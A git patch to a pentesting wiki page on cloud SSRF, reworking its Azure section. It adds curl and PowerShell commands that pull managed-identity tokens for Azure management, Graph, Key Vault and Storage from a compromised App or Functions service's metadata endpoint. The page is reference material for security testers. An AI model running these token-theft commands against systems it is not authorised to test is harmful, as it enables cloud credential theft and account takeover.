From 9115fb9fb3c4ad85ce6363c0439f474c76802037 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Tue, 24 Dec 2024 12:58:35 +0000 Subject: [PATCH] GITBOOK-4454: No subject --- .../cloud-ssrf.md | 28 ++++++++++++++++--- 1 file changed, 24 insertions(+), 4 deletions(-) diff --git a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md index dd19a3f76..b6721d66b 100644 --- a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md +++ b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md @@ -451,6 +451,7 @@ curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&res {% endtab %} {% tab title="PS" %} +{% code overflow="wrap" %} ```bash # Powershell Invoke-RestMethod -Headers @{"Metadata"="true"} -Method GET -NoProxy -Uri "http://169.254.169.254/metadata/instance?api-version=2021-02-01" | ConvertTo-Json -Depth 64 @@ -463,12 +464,13 @@ $userData = Invoke- RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "h /metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text /metadata/instance/compute/userData?api-version=2021-01-01&format=text ``` +{% endcode %} {% endtab %} {% endtabs %} -### Azure App Service +### Azure App & Functions Services -From the **env** you can get the values of `IDENTITY_HEADER` _and_ `IDENTITY_ENDPOINT`. That you can use to gather a token to speak with the metadata server. +From the **env** you can get the values of **`IDENTITY_HEADER`** and **`IDENTITY_ENDPOINT`**. That you can use to gather a token to speak with the metadata server. Most of the time, you want a token for one of these resources: @@ -477,6 +479,13 @@ Most of the time, you want a token for one of these resources: * [https://graph.microsoft.com](https://graph.microsoft.com/) * [https://management.azure.com](https://management.azure.com/) +{% hint style="danger" %} +In the token requests use any of the parameters `object_id`, `client_id` or `msi_res_id` to indicate the managed identity you want to use ([**docs**](https://learn.microsoft.com/en-us/entra/identity/managed-identities-azure-resources/how-to-use-vm-token)). If none, the **default MI will be used**. +{% endhint %} + +{% tabs %} +{% tab title="Bash" %} +{% code overflow="wrap" %} ```bash # Check for those env vars to know if you are in an Azure app echo $IDENTITY_HEADER @@ -486,11 +495,19 @@ echo $IDENTITY_ENDPOINT ls /opt/microsoft # Get management token -curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2019-08-01" -H X-IDENTITY-HEADER:$IDENTITY_HEADER +curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2019-08-01" -H "X-IDENTITY-HEADER:$IDENTITY_HEADER" # Get graph token -curl "$IDENTITY_ENDPOINT?resource=https://graph.azure.com/&api-version=2019-08-01" -H X-IDENTITY-HEADER:$IDENTITY_HEADER +curl "$IDENTITY_ENDPOINT?resource=https://graph.microsoft.com/&api-version=2019-08-01" -H "X-IDENTITY-HEADER:$IDENTITY_HEADER" +# Get vault token +curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net/&api-version=2019-08-01" -H "X-IDENTITY-HEADER:$IDENTITY_HEADER" +# Get storage token +curl "$IDENTITY_ENDPOINT?resource=https://storage.azure.com/&api-version=2019-08-01" -H "X-IDENTITY-HEADER:$IDENTITY_HEADER" ``` +{% endcode %} +{% endtab %} +{% tab title="PS" %} +{% code overflow="wrap" %} ```powershell # API request in powershell to management endpoint $Token = 'eyJ0eX..' @@ -532,6 +549,9 @@ At line:1 char:1 + FullyQualifiedErrorId : Microsoft.Azure.Commands.ResourceManager.Cmdlets.Implementation.GetAzureResourceCmdlet ``` +{% endcode %} +{% endtab %} +{% endtabs %} ## IBM Cloud